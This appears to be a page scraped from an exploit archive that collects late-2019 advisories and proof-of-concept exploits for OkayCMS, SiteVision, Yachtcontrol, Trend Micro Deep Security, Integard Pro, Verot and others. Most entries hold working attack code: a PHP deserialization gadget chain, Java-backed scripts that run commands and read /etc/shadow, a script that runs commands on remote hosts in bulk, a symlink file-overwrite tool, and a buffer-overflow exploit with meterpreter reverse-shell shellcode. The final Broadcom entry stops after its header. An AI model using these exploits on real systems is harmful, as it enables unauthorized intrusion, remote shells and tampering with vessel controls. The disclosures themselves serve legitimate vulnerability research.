OkayCMS versions 2.3.4 and below suffer from remote code execution vulnerability.

MD5 | ac48925812fe6df9cf4011ec5409f36d

# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```


## Proof of Concept
The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:

```
<?php

if($argc != 3)
{
print "usage: $argv[0] n";
exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
$cached->is_locked = false;
@unlink($cached->lock_id);
}
}

class Smarty_Template_Cached {
public $handler = null;
public $is_locked = true;
public $lock_id = "";

public function __construct() {
$this->lock_id = $GLOBALS['file'];
$this->handler = new Smarty_Internal_CacheResource_File;
}
}


class Smarty {
public $cache_locking = true;
}

class Smarty_Internal_Template {
public $smarty = null;
public $cached = null;

public function __construct() {
$this->smarty = new Smarty;
$this->cached = new Smarty_Template_Cached;
}

public function __destruct(){
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
'Accept-Language: en-US,en;q=0.5',
"Referer: $url/en/catalog/myagkie-igrushki",
'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
print curl_error($curl);
}
curl_close($curl);


print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:
* https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)



Source

SiteVision suffers from an issue where attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account. All versions of SiteVision 4 until 4.5.6 and all versions of SiteVision 5 until 5.1.1 are vulnerable.

MD5 | d41da44b8c24a9290a4500079e64ac00

# SiteVision Remote Code Execution

CVE-2019-12733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12733
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/

## Summary
Attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account.

## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.

## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.

## Technical Details
The SiteVision application does not sufficiently validate whether or not the current user is permitted to add or edit modules of the "script" type. This means that a low-privilege user such as an Editor ("Redaktör") can inject a new script module, or edit an existing one, and leverage it to execute arbitrary code.

The access control flaw allowing users to inject non-authorized modules are described separately in CVE-2019-12734.

While the scripts are written in JavaScript, the environment allows the developer to reach and import Java APIs.

Reproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "script". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"script","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Issue the modified request to the application.
8. Reload the current page and note how it now contains a script module.
9. Edit the script module to contain the following JavaScript code:

```
const app = (() => {
'use strict';

importPackage(java.io);
importPackage(java.lang);

const init = () => {
var result = [];

var p = Runtime.getRuntime().exec("whoami");
var stdInput = new BufferedReader( new InputStreamReader( p.getInputStream() ) );
var s;
while (( s = stdInput.readLine()) != null) {
result.push(s);
}

return result;

};

return { init: init };
})();

const context = app.init();
```

9b. Following PoC can be used for reading files such as /etc/passwd or /etc/shadow:

```
const app = (() => {
'use strict';

importPackage(java.io);
importPackage(java.lang);

const init = () => {
var result = [];
var file = new File('/etc/passwd');
var br = new BufferedReader(new FileReader(file));

var st;
while ((st = br.readLine()) != null) {
result.push(st);
}

return result;
};

return { init: init };
})();

const context = app.init();
```

10. Enter the following Velocity code:

```


Script output:

As List:

    #foreach( $c in $context )

  • $c
  • Source

SiteVision suffers from an issue where attacker may inject non-authorized module when editing pages using a lower privileged account, which can lead to cross site scripting and remote code execution. All versions of SiteVision 4 until 4.5.6 and all versions of SiteVision 5 until 5.1.1 are vulnerable.

MD5 | e1039e826a6e95e90bc983b83ebc51fe

# SiteVision Insufficient Module Access Control

CVE-2019-12734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12734
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/


## Summary
Attackers may inject non-authorised modules when editing pages using a low-privilege account, leading to impacts ranging from Cross-Site Scripting to Remote Code Execution.


## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.


## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.


## Technical Details
This vulnerability allows remote code execution as described in CVE-2019-12733.

Modules are basic building blocks in SiteVision pages and templates; they can feature display content such as headings and paragraphs, social functions and commenting, raw HTML, or server-side scripts.

The SiteVision application does not sufficiently assert whether or not the current user is authorised to add a specific module type to the current page, allowing attackers with low-privilege to add hostile content. This can trivially be reproduced by adding a paragraph text module, and changing "text" to "html" (or any other type) in the outgoing HTTP request. The application does not check whether or not the user is authorised to add the requested module; it relies on the fact that the user interface does not expose a button for it.

Reproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "html". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"html","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Edit the HTML module and inject any JavaScript payload such as `alert(1)`.
8. Under "Other" check "Show in edit mode".
9. Press "OK".
10. Note the alert pop-up, indicating that the injected JavaScript was executed.


## Vulnerability Disclosure Timeline
2019-06-03 - Disclosed to vendor
2019-06-04 - Vendor confirms vulnerability
2019-09-26 - Vendor issues patches
2019-12-04 - Public disclosure

Oscar Hjelm
Cybercom Sweden


Source

A malicious application can take advantage of a vulnerability in Symantec Endpoint Protection to leak privileged information and/or execute code with higher privileges, thus taking full control over the affected host. Symantec Endpoint Protection versions 14.x below 14.2 (RU1) and 12.x below 12.1 (RU6 MP10) are affected. Symantec Endpoint Protection Small Business Edition versions 12.x below 12.1 (RU6 MP10c) are affected.

MD5 | adaa581b77f7d19cd5f1123812a01cb9

Advisory
A malicious application can take advantage of a vulnerability in Symantec Endpoint Protection to leak privileged information and/or execute code with higher privileges, thus taking full control over the affected host.

Products Affected
Symantec Endpoint Protection v14.x < v14.2 (RU1)
Symantec Endpoint Protection v12.x < 12.1 (RU6 MP10)
Symantec Endpoint Protection Small Business Edition v12.x < 12.1 (RU6 MP10c)

https://support.symantec.com/us/en/article.SYMSA1487.html
https://labs.nettitude.com/blog/cve-2019-12750-symantec-endpoint-protection-local-privilege-escalation-part-1/

Timeline
Date of discovery: April 2019
Vendor informed: 18 April 2019
Vendor Acknowledged: 19 April 2019
Vendor Requested Extra Time: 19 April 2019
Advisory [1]: 31 July 2019
Nettitude blog [2]: 5 December 2019

References

1. https://support.symantec.com/us/en/article.SYMSA1487.html

2. https://labs.nettitude.com/blog/cve-2019-12750-symantec-endpoint-protection-local-privilege-escalation-part-1/

Kyriakos Economou
Senior Vulnerability Researcher


T: 0345 520 0085

E: keconomou@nettitude.com


UK: 1 Jephson Court, Tancred Cl, Leamington Spa, CV31 3RZ

[cid:image002.png@01D5AC18.B5AAA630]



[Facebook icon] [LinkedIn icon] [Twitter icon] [Youtbue icon]
















___________________________________________________________________________________
Lloyd’s Register and variants of it are trading names of Lloyd’s Register Group Limited, its subsidiaries and affiliates.
Nettitude Limited, registered in England, registered number 4705154
Registered office: 1 Jephson Court, Tancred Close, Leamington Spa, Warwickshire, CV31 3RZ. A member of the Lloyd’s Register group.

Lloyd’s Register Group Limited, its affiliates and subsidiaries and their respective officers, employees or agents are individually and collectively, referred to in this clause as ‘Lloyd’s Register’. Lloyd’s Register assumes no responsibility and shall not be liable to any person for any loss, damage or expense caused by reliance on the information or advice in this document or howsoever provided, unless that person has signed a contract with the relevant Lloyd’s Register entity for the provision of this information or advice and in that case any responsibility or liability is exclusively on the terms and conditions set out in that contract.
___________________________________________________________________________________

Source

Yachtcontrol versions dated 2019-10-06 suffer from an unauthenticated remote code execution vulnerability.

MD5 | ca74a5272a744f07e91607ab0200e00a

# Exploit Title: Yachtcontrol Webapplication - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2019-12-06
# Exploit Author: Hodorsec
# Vendor Homepage: http://www.yachtcontrol.nl/en/
# Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/
# Versions: Yachtcontrol webapplication through versions dated on 2019-10-06
# Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
# CVE: CVE-2019-17270
#
# Description Product:
# Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
# it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components.
# Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht.
# Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices.
#
# Description Vulnerability:
# It's possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}"
# page and parameter, where {COMMAND} will be executed and returning the results to the client.
#
# Affected Components:
# Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06.

#!/usr/bin/python
import sys,os,requests

# Check arguments
if len(sys.argv) != 5:
print "Error: enter at least one IP/FQDN as argument. Exiting..."
print "nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}n"
exit(0)

# Parameters
host = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]
command = sys.argv[4]
timeout = 10
isFile = False

# Check for file or single IP/FQDN
if os.path.isfile(host):
isFile = True
with open(host) as f:
targets = f.readlines()

# Vulnerable page
page = "/pages/systemcall.php?command="

# HTTP or HTTPS
if proto == "http":
proto = "http://"
elif proto == "https":
proto = "https://"
else:
print "nInvalid method given: enter http or httpsn"
exit(0)

# Do the request
if isFile:
for host in targets:
target = host.strip()
print target
try:
response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout)
print(response.content.replace('executing command: ' + command,''))
except requests.exceptions.Timeout:
print "Timed out."
pass
except requests.exceptions.RequestException as e:
print "Host not found."
pass
else:
try:
response = requests.get(proto + host + ":" + port + page + command, verify=False, timeout=timeout)
print(response.content.replace('executing command: ' + command,''))
except requests.exceptions.Timeout:
print "Timed out."
pass
except requests.exceptions.RequestException as e:
print "Host not found."
pass

# Disclosure Timeline using CERT/CC disclosure policy:
# - 06-10-19: Requested CVE
# - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses
# - 12-10-19: Sent reminder due to no response
# - 06-11-19: Sent second reminder due to no response
# - 08-11-19: Received response requesting information, sent information
# - 11-11-19: Correspondence concerning vulnerability
# - 25-11-19: Sent reminder of publishing PoC to vendor, received response
# - 05-12-19: Sent final reminder of publishing PoC to vendor
# - 06-12-19: Public Disclosure

Source

Trend Micro Deep Security Agent 11 suffers from an arbitrary file overwrite vulnerability.

MD5 | 679cae457bfcd23467151f2a07ff694f

# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
# Exploit Author : Peter Lapp
# Exploit Date: 2019-12-05
# Vendor Homepage : https://www.trendmicro.com/en_us/business.html
# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
# CVE: 2019-15627

# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)

# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)
# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS,
# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired.

# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file.
# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage,
# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces,
# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that
# are ripe for the writing that can then point to a malicious binary.

# Usage:
# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part.
# 2. Open a browser (preferrably IE) and start the script
# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
# 4. Keep refreshing the page until you see the script create the target file overwritten.
#
# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit.


import time
import os
import subprocess
import sys
import webbrowser
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

class Stage1_Handler(FileSystemEventHandler):
def __init__(self):
self.filenames = []
def on_created(self, event):
filename = os.path.basename(event.src_path)
if filename in self.filenames:
print ('Starting symlink creation.')
watcher1.stop()
symlinkery(self.filenames)
else:
self.filenames.append(filename)
print ('File %s created.') % filename

class Stage2_Handler(FileSystemEventHandler):
def on_any_event(self, event):
if os.path.basename(event.src_path) == 'dsa_control.cmd':
print "Target file overwritten/deleted. Cleaning up."
subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
os.system('rmdir /S /Q "C:\ProgramData\Trend Micro\AMSP\temp\"')
os.system('rmdir /S /Q "C:\test"')
os.rename('C:\ProgramData\Trend Micro\AMSP\temp-orig','C:\ProgramData\Trend Micro\AMSP\temp')
watcher2.stop()
sys.exit(0)

class Watcher(object):
def __init__(self, event_handler, path_to_watch):
self.event_handler = event_handler
self.path_to_watch = path_to_watch
self.observer = Observer()
def run(self):
self.observer.schedule(self.event_handler(), self.path_to_watch)
self.observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.observer.stop()

self.observer.join()
def stop(self):
self.observer.stop()

def symlinkery(filenames):
print "Enter symlinkery"
for filename in filenames:
print "Creating symlink for %s" % filename
cmdname = "start cmd /c CreateSymlink.exe "C:\test\virus\%s" "C:\test\test\symtarget"" % filename
subprocess.Popen(cmdname, shell=True)
os.rename('C:\ProgramData\Trend Micro\AMSP\temp','C:\ProgramData\Trend Micro\AMSP\temp-orig')
os.system('mklink /J "C:\ProgramData\Trend Micro\AMSP\temp" C:\test')
watcher2.run()
print "Watcher 2 started"

try:
os.mkdir('C:\test')
except:
pass

path1 = 'C:\ProgramData\Trend Micro\AMSP\temp\virus'
path2 = 'C:\Program Files\Trend Micro\Deep Security Agent\'
watcher1 = Watcher(Stage1_Handler,path1)
watcher2 = Watcher(Stage2_Handler,path2)
switcheroo = "start cmd /c BaitAndSwitch.exe C:\test\test\symtarget "C:\Program Files\Trend Micro\Deep Security Agent\dsa_control.cmd" "C:\windows\temp\deleteme.txt" d"
subprocess.Popen(switcheroo, shell=True)
watcher1.run()

Source

Integard Pro NoJs version 2.2.0.9026 suffers from a remote buffer overflow vulnerability.

MD5 | a2fb460aecb7da8b7638b7121d90da78

Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Date: 2019-09-22
Exploit Author: purpl3f0xsecur1ty
Vendor Homepage: https://www.tucows.com/
Software Link: http://www.tucows.com/preview/519612/Integard-Home
Version: Pro 2.2.0.9026 / Home 2.0.0.9021
Tested on: Windows XP / Win7 / Win10
CVE: CVE-2019-16702

#!/usr/bin/python
########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input #
# to the "NoJs" parameter in an HTTP POST request, #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code #
# execution. #
########################################################

import socket
import os
import sys
from struct import pack

def main():
print "~*Integard RCE Exploit for XP/7/10*~"
print "Chose target: (Enter number only)"
print "1) - Windows XP"
print "2) - Windows 7/10"
target = str(input())
host = "10.0.0.130"
port = 18881

####################################################
# Integard's functionality interferes with reverse #
# and bind shells. Only Meterpreter seems to work. #
####################################################

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
# -b "x00x26x2fx3dx3fx5c" -f python -v meterpreter EXITFUNC=thread
meterpreter = "x90" * 50
meterpreter += "xdaxcdxbexa2x51xcex97xd9x74x24xf4"
meterpreter += "x5fx2bxc9xb1x5bx83xefxfcx31x77x15"
meterpreter += "x03x77x15x40xa4x32x7fx06x47xcbx80"
meterpreter += "x66xc1x2exb1xa6xb5x3bxe2x16xbdx6e"
meterpreter += "x0fxddx93x9ax84x93x3bxacx2dx19x1a"
meterpreter += "x83xaex31x5ex82x2cx4bxb3x64x0cx84"
meterpreter += "xc6x65x49xf8x2bx37x02x77x99xa8x27"
meterpreter += "xcdx22x42x7bxc0x22xb7xccxe3x03x66"
meterpreter += "x46xbax83x88x8bxb7x8dx92xc8xfdx44"
meterpreter += "x28x3ax8ax56xf8x72x73xf4xc5xbax86"
meterpreter += "x04x01x7cx78x73x7bx7ex05x84xb8xfc"
meterpreter += "xd1x01x5bxa6x92xb2x87x56x77x24x43"
meterpreter += "x54x3cx22x0bx79xc3xe7x27x85x48x06"
meterpreter += "xe8x0fx0ax2dx2cx4bxc9x4cx75x31xbc"
meterpreter += "x71x65x9ax61xd4xedx37x76x65xacx5f"
meterpreter += "xbbx44x4fxa0xd3xdfx3cx92x7cx74xab"
meterpreter += "x9exf5x52x2cx96x11x65xe2x10x71x9b"
meterpreter += "x03x61x58x58x57x31xf2x49xd8xdax02"
meterpreter += "x75x0dx76x08xe1xa4x87x0cx71xd0x85"
meterpreter += "x0cx52x08x03xeaxc4x1ax43xa2xa4xca"
meterpreter += "x23x12x4dx01xacx4dx6dx2ax66xe6x04"
meterpreter += "xc5xdfx5fxb1x7cx7ax2bx20x80x50x56"
meterpreter += "x62x0ax51xa7x2dxfbx10xbbx5ax9cxda"
meterpreter += "x43x9bx09xdbx29x9fx9bx8cxc5x9dxfa"
meterpreter += "xfbx4ax5dx29x78x8cxa1xacx49xe7x94"
meterpreter += "x3axf6x9fxd8xaaxf6x5fx8fxa0xf6x37"
meterpreter += "x77x91xa4x22x78x0cxd9xffxedxafx88"
meterpreter += "xacxa6xc7x36x8bx81x47xc8xfex91x80"
meterpreter += "x36x7dxbex28x5fx7dxfexc8x9fx17xfe"
meterpreter += "x98xf7xecxd1x17x38x0dxf8x7fx50x84"
meterpreter += "x6dxcdxc1x99xa7x93x5fx9ax44x08x6f"
meterpreter += "xe1x25xafx90x16x2cxd4x90x17x50xea"
meterpreter += "xadxcex69x98xf0xd3xcdx83xeexf9x3b"
meterpreter += "x2cxb7x68x86x31x48x47xc5x4fxcbx6d"
meterpreter += "xb6xabxd3x04xb3xf0x53xf5xc9x69x36"
meterpreter += "xf9x7ex89x13"

if target == "1":
print "[*] Sending Windows XP payload using meterpreter/reverse_tcp"
# JMP ESP at 0x3E087557 in iertutil.dll
crash = "A" * 512
crash += pack("<L",0x3E087557)
crash += meterpreter
crash += "C" * (1500 - len(crash))

buffer = ""
buffer += "POST /LoginAdmin HTTP/1.1rn"
buffer += "Host: 10.0.0.130:18881rn"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0rn"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
buffer += "Accept-Language: en-US,en;q=0.5rn"
buffer += "Accept-Encoding: gzip, deflatern"
buffer += "Referer: http://10.0.0.130:18881/rn"
buffer += "Connection: closern"
buffer += "Upgrade-Insecure-Requests: 1rn"
buffer += "Content-Type: application/x-www-form-urlencodedrn"
buffer += "Content-Length: 78rnrn"
buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Loginrn"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(buffer)
s.close()
print "[*] Done"

if target == "2":
print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"

# ASLR IS ON!!! MUST USE NON-ASLR MODULE!
# POP POP RET in integard.exe (ASLR disabled)
nSEH = "xEBxD0x90x90" # Jump 48 bytes backwards
SEH = pack("<L",0x004042B0)

jumpCall = "xEBx09" # Jump 11 bytes forward to hit the CALL in bigBackJump
bigBackJump = "x59xFExCDxFExCDxFExCDxFFxE1xE8xF2xFFxFFxFF"

crash = "x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
crash += meterpreter
crash += "x90" * 50
crash += jumpCall
crash += bigBackJump
crash += nSEH
crash += SEH


buffer = ""
buffer += "POST /LoginAdmin HTTP/1.1rn"
buffer += "Host: 10.0.0.130:18881rn"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0rn"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
buffer += "Accept-Language: en-US,en;q=0.5rn"
buffer += "Accept-Encoding: gzip, deflatern"
buffer += "Referer: http://10.0.0.130:18881/rn"
buffer += "Connection: closern"
buffer += "Upgrade-Insecure-Requests: 1rn"
buffer += "Content-Type: application/x-www-form-urlencodedrn"
buffer += "Content-Length: 78rnrn"
buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Loginrn"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(buffer)
s.close()
print "[*] Done"

main()

Source

Verot version 2.0.3 suffers from a remote code execution vulnerability.

MD5 | 6739d5e2efeb9ae98d493066bae7aa08

# Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576

<?php
#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation

#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).

ini_set('display_errors', 1);
error_reporting(E_PARSE);
#requires php, php-gd

$orig = 'image.jpg';
$code = '';
$quality = "85";
$base_url = "http://lorempixel.com";

echo "-=Imagejpeg injector 1.7=-n";

do
{
$x = 100;
$y = 100;
$url = $base_url . "/$x/$y/";

echo "[+] Fetching image ($x X $y) from $urln";
file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));

echo "[+] It seems like it worked!n";
echo "[+] Result file: image.jpg.pharn";

function tryInject($orig, $code, $quality)
{
$result_file = 'image.jpg.phar';
$tmp_filename = $orig . '_mod2.jpg';

//Create base image and load its data
$src = imagecreatefromjpeg($orig);

imagejpeg($src, $tmp_filename, $quality);
$data = file_get_contents($tmp_filename);
$tmpData = array();

echo "[+] Jumping to end byten";
$start_byte = findStart($data);

echo "[+] Searching for valid injection pointn";
for($i = strlen($data)-1; $i > $start_byte; --$i)
{
$tmpData = $data;
for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
{
$tmpData[$n] = $code[$z];
}

$src = imagecreatefromstring($tmpData);
imagejpeg($src, $result_file, $quality);

if(checkCodeInFile($result_file, $code))
{
unlink($tmp_filename);
unlink($result_file);
sleep(1);

file_put_contents($result_file, $tmpData);
echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failedn";

sleep(1);
$src = imagecreatefromjpeg($result_file);

return true;
}
else
{
unlink($result_file);
}
}
unlink($orig);
unlink($tmp_filename);
return false;
}

function findStart($str)
{
for($i = 0; $i < strlen($str); ++$i)
{
if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
{
return $i+2;
}
}

return -1;
}

function checkCodeInFile($file, $code)
{
if(file_exists($file))
{
$contents = loadFile($file);
}
else
{
$contents = "0";
}

return strstr($contents, $code);
}

function loadFile($file)
{
$handle = fopen($file, "r");
$buffer = fread($handle, filesize($file));
fclose($handle);

return $buffer;
}

Source

Microsoft Skype for Business latest versions affected from external service interaction (DNS) vulnerability. A remote attacker could force the vulnerable server to send DNS request to any remote server attacker wants.

MD5 | 695c9907241fa97e0fd828f91598f381

I. VULNERABILITY
-------------------------
Microsoft Skype for Business External Service Interaction (DNS)
Latest Version

II. CVE REFERENCE
-------------------------
Not Assigned Yet

III. VENDOR
-------------------------
https://www.microsoft.com

IV. TIMELINE
-------------------------
28/11/2019 Vulnerability discovered
03/12/2019 Vendor contacted
04/12/2019 Microsoft replay that “We determined that this behavior is
considered to be by design.”

V. CREDIT
-------------------------
Alphan Yavas from Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Microsoft Skype for Business latest versions affected from external
service interaction(DNS) vulnerability. A remote attacker could force
the vulnerable server to send DNS request to any remote server
attacker wants.

VII. PROOF OF CONCEPT
-------------------------
Affected Component:
Path(inurl): /Dialin/Conference.aspx
Parameter: Username

Login page of Skype for Business affected from external service
interaction (DNS) vulnerability. If username is being sent with
following format victim server will send out DNS queries to xxx
domain. (xxx is the domain which you want to send request from
server)

username: ssrf.xxx.compentest
password: (doesn't matter)

Reference: https://portswigger.net/kb/issues/00300200_external-service-interaction-dns

Source

Broadcom CA Privileged Access Manager version 2.8.2 suffers from a remote command execution vulnerability.

MD5 | 87439e7b65cfd91d03cf76e57930cd73

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
